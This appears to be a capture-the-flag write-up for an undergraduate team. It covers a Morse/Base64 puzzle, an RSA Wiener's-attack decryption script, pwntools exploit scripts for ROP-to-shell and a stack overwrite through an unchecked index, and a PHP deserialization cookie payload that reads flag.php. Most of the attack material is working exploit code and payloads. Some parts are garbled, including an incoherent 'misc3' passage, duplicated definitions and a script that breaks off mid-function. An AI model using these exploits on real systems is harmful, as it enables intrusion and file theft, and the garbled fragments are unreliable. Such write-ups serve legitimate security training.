Undergraduate Group
1837
MTEgMTExIDAwMCAwMCAwMTExMSAwMDAgMDAxMCAwMDEgMTA
Base64-decode the string, then read the resulting groups of 0s and 1s as Morse code (0 = dot, 1 = dash).
flag{mosi1sfun}
rsa
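e is very large (about the same size as n), which suggests a small private exponent d, so consider Wiener's attack. The defensive takeaway: generate keys with a standard public exponent such as 65537 so that d is full-size.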
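import gmpy2
import libnum


def continuedFra(x, y):
    """Return the continued-fraction expansion of x / y.

    :param x: numerator
    :param y: denominator
    :return: list of partial quotients [a0, a1, ...]
    """
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf


def gradualFra(cf):
    """Fold a list of partial quotients into one fraction.

    The fold runs from the last quotient back to the first and returns the
    reciprocal of the convergent: for cf = [a0, a1, ...] the result
    (numerator, denominator) satisfies
    numerator / denominator = 1 / (a0 + 1 / (a1 + ...)).
    For the expansion of e / n ~ k / d this is the pair (d, k).

    :param cf: list of partial quotients
    :return: (numerator, denominator) as described above
    """
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # Numerator and denominator are kept as separate integers so no
        # precision is lost.
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator


def solve_pq(a, b, c):
    """Return the two integer roots of a*x^2 + b*x + c = 0.

    Intended use (Vieta's formulas): p and q are the roots of
    x^2 - (p + q)*x + p*q = 0.  The caller in this file passes
    b = +(p + q), so the roots come back as -p and -q; their product is
    still p*q, which is all the caller checks.

    gmpy2.isqrt raises ValueError for a negative discriminant, so callers
    must rule that case out first.

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: the two roots, floor-divided
    """
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)


def getGradualFra(cf):
    """Return gradualFra() of every prefix of cf.

    :param cf: list of partial quotients
    :return: list of (numerator, denominator) pairs, one per prefix
    """
    return [gradualFra(cf[:i]) for i in range(1, len(cf) + 1)]


def wienerAttack(e, n):
    """Recover a small RSA private exponent from the public key (Wiener).

    Each convergent of e / n is tried as a candidate k / d; a candidate is
    accepted when the phi it implies yields two integers whose product is n.

    :param e: public exponent
    :param n: modulus
    :return: private exponent d, or None when no convergent factors n
        (i.e. d is not small enough for this method)
    """
    for d, k in getGradualFra(continuedFra(e, n)):
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1  # equals p + q when phi is the true totient
        if s * s - 4 * n < 0:
            # A wrong candidate can give a negative discriminant, which
            # would make gmpy2.isqrt raise instead of moving on.
            continue
        p, q = solve_pq(1, s, n)
        if p * q == n:
            return d
    return None


# NOTE(review): on the page each hex literal below is broken by stray
# whitespace (most likely line wrapping in the original document).  The
# pieces are kept exactly as they appear and simply joined; check them
# against the original challenge file before relying on the values.
n = int(
    "1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d"
    "17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93b"
    "f",
    16,
)
e = int(
    "e42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac0"
    "18cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939",
    16,
)
c = int(
    "d19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92"
    "533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3",
    16,
)

d = wienerAttack(e, n)
if d is None:
    # Fail with a clear message instead of a TypeError from pow(c, None, n).
    raise SystemExit("Wiener attack found no private exponent for this (e, n)")
print(d)
m = pow(c, d, n)
print(libnum.n2s(m).decode())
# flag1sH3r3_d_ist0sma1l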
misc3
Two-question plaintext attack
CTF-Misc Essentials | JackHCC
Why can’t the original flag be handed in?
I can’t hand in the flag, ? Will there be a competition, flag crtl + c v v is not good? Get the answer right? Right understand?
Let’s make something to eat
#coding:utf-8 from pwn import * from LibcSearcher import * from sys import * context.log_level = 'debug' context.terminal = ['tmux','splitw','-h'] context(arch='amd64', os='linux') file = './food' p = process(file) e = ELF(file) rop = ROP(file) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') if args.R: p = remote('n',) e = ELF(file) libc = ELF('./libc-2.27.buu.so') lg = lambda s : log.success('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s))) uu32 = lambda data :u32(data.ljust(4,b'\x00')) uu64 = lambda data :u64(data.ljust(8,b'\x00')) uu32 = lambda data : u32(data. ljust(4, b'\x00')) uu64 = lambda data : u64(data. ljust(8, b'\x00')) sla = lambda x,y : p.sendlineafter(x,y) sa = lambda x,y : p.sendafter(x,y) sl = lambda x : p. sendline(x) s = lambda x : p.send(x) ru = lambda x : p.recvuntil(x) r = lambda x : p.recv(x) rl = lambda: p.recvline() system = 0 binsh = 0 poprdi = 0 ret = 0 libc_base = 0 def cuos(func, addr): global system, binsh, poprdi, ret, libc_base libc_base = addr - libc.sym[func] log.success('libc_base = ' + hex(libc_base)) system = libc_base + libc.sym['system'] log.success('system = ' + hex(system)) binsh = libc_base + next(libc. search(b'/bin/sh\x00')) log.success('binsh = ' + hex(binsh)) poprdi = rop.find_gadget(['pop rdi','ret'])[0] log.success('poprdi = ' + hex(poprdi)) ret = rop.find_gadget(['ret'])[0] log.success('ret = ' + hex(poprdi)) def csu(text,edi,rsi,rdx,rip): payload = b"" payload += p64(0x400c40 + 90) payload += p64(0) #rbx payload += p64(1) #rbp payload += p64(rip) #r12 payload += p64(rdx) #r13 payload += p64(rsi) #r14 payload += p64(edi) #r15 payload += p64(0x400c40 + 64) payload += p64(0)*7 return payload def debug(cmd=''): gdb. attach(p, cmd) #pause() #"b $rebase(0x10)" def add(index, size): sla('5.- Exit\\ ','1') sla('the food\\ ', str(index)) sla(' kcal.\\ ', str(size)) def edit(index,des):
just stack overflow
# pwntools script for the local challenge binary './pwn' (the page labels it
# "just stack overflow").  It answers two start-up prompts, uses menu option 3
# four times to write one value each at indices 0x84-0x87, then picks menu
# option 5 and hands the session to the user.
from pwn import *
from struct import pack
from ctypes import *
import hashlib
# NOTE(review): pack, ctypes and hashlib are not used anywhere in this listing.
# Thin wrappers around the tube I/O methods of the global process `p`.
def s(a):
    p. send(a)
def sa(a, b):
    p. sendafter(a, b)
def sl(a):
    p. sendline(a)
def sla(a, b):
    p. sendlineafter(a, b)
def r():
    # NOTE(review): the received data is discarded (no return).
    p.recv()
def pr():
    print(p. recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p. interactive()
def debug():
    """Attach gdb to the process and wait for a key press."""
    gdb. attach(p)
    pause()
def get_addr():
    """Read up to a 0x7f byte and unpack the last six bytes as a 64-bit value."""
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    # NOTE(review): libc_base is never assigned in this listing, so calling
    # this would raise NameError; it is not called below.
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
# NOTE(review): arch is set to amd64 here, while the breakpoint address in the
# commented-out gdb line below looks like a 32-bit address — confirm the target.
context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn') #p = remote('', )
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# NOTE(review): the `\\ ` at the end of each prompt string looks like an
# extraction artefact (possibly originally a newline escape) — confirm.
sla(b'have:\\ ', b'1')
sla(b'numbers\\ ', b'1')
def edit(idx, data):
    """Drive menu option 3: send idx, then data, both as decimal strings.

    NOTE(review): str(...) is passed where the other calls pass bytes.
    """
    sla(b'exit\\ ', b'3')
    sla(b'change:\\ ', str(idx))
    sla(b'number:\\ ', str(data))
# Four single-value writes at consecutive indices; read as little-endian bytes
# the values 0x9b, 0x85, 0x04, 0x08 spell 0x0804859b.
# NOTE(review): presumably the target does not bounds-check the index it is
# given; on the target side the fix would be a range check on the index before
# the write — confirm against the binary.
edit(0x84, 0x9b)
edit(0x85, 0x85)
edit(0x86, 0x4)
edit(0x87, 0x8)
#gdb.attach(p, 'b *0x80488F2')
sla(b'exit\\ ', b'5') #pause()
inter()
pop
<?php
// Challenge source for a small "todo" page.  The todo list is kept entirely
// in a client-side cookie as md5(serialized) . serialized.
header("content-type:text/html;charset=utf-8");

class Readme{
    // Path of the file that __toString() will render.
    public $source;

    // Returns the highlighted contents of Readme.txt followed by the
    // highlighted contents of whatever path $source holds.
    public function __toString() {
        return highlight_file('Readme.txt', true).highlight_file($this->source, true);
    }
}

// ?source=... shows this file's own source and stops.
if(isset($_GET['source'])){
    $s = new Readme();
    $s->source = __FILE__;
    echo $s;
    exit;
}

$todos = [];
if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    // First 32 characters: hex MD5; remainder: the serialized list.
    $h = substr($c, 0, 32);
    $m = substr($c, 32);
    // NOTE(review): a plain md5() involves no secret, so this check only
    // detects accidental corruption; the client can recompute the hash for
    // any payload it likes.
    if(md5($m) === $h){
        // NOTE(review): unserialize() on client-controlled data can
        // instantiate any loaded class, including Readme with a chosen
        // $source.  If an element of $todos is later used as a string (the
        // rendering code is not shown here), __toString() would disclose
        // that file.  Safer: keep the list in the server-side session, or
        // use json_encode()/json_decode(); if a cookie must be used,
        // authenticate it with hash_hmac() and a server-side key, compare
        // with hash_equals(), and pass ['allowed_classes' => false] to
        // unserialize().
        $todos = unserialize($m);
    }
}

// Append the posted text to the list, re-issue the cookie and redirect back
// to the same URI.
if(isset($_POST['text'])){
    $todo = $_POST['text'];
    $todos[] = $todo;
    $m = serialize($todos);
    $h = md5($m);
    setcookie('todos', $h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
GET /HTTP/1.1 Host: 1.1.2.100:1080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 6 Origin: http://1.1.2.100:1080 Connection: close Referer: http://1.1.2.100:1080/ Cookie: todos=fae1710f5e51885bcf095e718ca752cca:1:{i:0;O:6:"readme":1:{s:6:"source";s:10:"./flag.php"; }} Upgrade-Insecure-Requests: 1 text=1